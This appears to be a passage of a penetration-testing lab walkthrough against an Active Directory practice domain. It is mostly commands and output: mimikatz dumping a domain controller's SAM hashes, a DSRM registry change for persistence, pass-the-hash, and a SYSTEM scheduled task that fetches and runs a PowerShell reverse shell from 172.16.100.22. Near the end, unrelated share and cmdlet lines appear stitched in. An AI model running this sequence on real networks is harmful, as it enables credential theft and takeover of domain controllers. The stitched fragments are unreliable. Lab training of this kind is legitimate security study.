Since we already have access to the DC let’s dump the SAM file

.\\BetterSafetyKatz.exe '"token::elevate"' '"lsadump::sam"' "exit"

Nice we got the Local Administrator Hash

The Secrets

[dcorp-dc]: PS C:\\Users\\svcadmin\\documents> .\\BetterSafetyKatz.exe '"token::elevate"' '"lsadump::sam"' "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <https://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <https://pingcastle.com> / <https://mysmartlogon.com> ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\\SYSTEM

616     {0;000003e7} 1 D 17861          NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01341191} 0 D 20294330    dcorp\\Administrator     S-1-5-21-719815819-3726368948-3917688648-500   (12g,26p)        Primary
 * Thread Token  : {0;000003e7} 1 D 20351197    NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!

Now let’s modify the “DsrmAdminLogonBehavior” Registry to be able to login as local admin

New-ItemProperty "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Now let’s use BetterSafetyKatz and Pass-The-Hash

.\\BetterSafetyKatz.exe '"sekurlsa::pth /user:Administrator /domain:dcorp-dc /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe"' "exit"

In the now CMD let’s Open PowerShell and Bypass the Execution Policy and Create Schedule Task on the Domain Controller

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"

Now let’s start the Task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
VisibleCmdlets = @{ Name = 'Get-Process' }
New-SmbShare -Name "data" -Path "C:\\Windows" -FullAccess "gcbinfra\\fileserveradmin"
New-SmbShare -Name "files" -Path "C:\\files" -FullAccess "gcbtech\\techadmin"

Now let’s go back to our listener